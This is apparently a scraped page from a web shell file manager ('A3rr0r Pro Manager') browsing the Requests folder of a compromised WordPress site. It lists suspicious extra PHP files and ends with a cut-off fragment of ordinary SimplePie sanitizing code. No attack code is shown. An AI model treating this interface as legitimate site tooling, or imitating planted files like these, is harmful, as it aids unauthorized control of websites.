A3rr0r Pro Manager
Path:
/www/wwwroot/www.smszp.cn/wp-includes/Requests
.
|
Edit
|
Rename
..
|
Edit
|
Rename
Requests.php
|
Edit
|
Rename
Requests_4251.php
|
Edit
|
Rename
Requests_8461.php
|
Edit
|
Rename
library
|
Edit
|
Rename
src
|
Edit
|
Rename
)/', $data ) ) { $type |= SimplePie\SimplePie::CONSTRUCT_HTML; } else { $type |= SimplePie\SimplePie::CONSTRUCT_TEXT; } } if ( $type & SimplePie\SimplePie::CONSTRUCT_BASE64 ) { $data = base64_decode( $data ); } if ( $type & ( SimplePie\SimplePie::CONSTRUCT_HTML | \SimplePie\SimplePie::CONSTRUCT_XHTML ) ) { $data = wp_kses_post( $data ); if ( 'UTF-8' !== $this->output_encoding ) { $data = $this->registry->call( 'Misc', 'change_encoding', array( $data, 'UTF-8', $this->output_encoding ) ); } return $data; } else { return parent::sanitize( $data, $type, $base ); } } }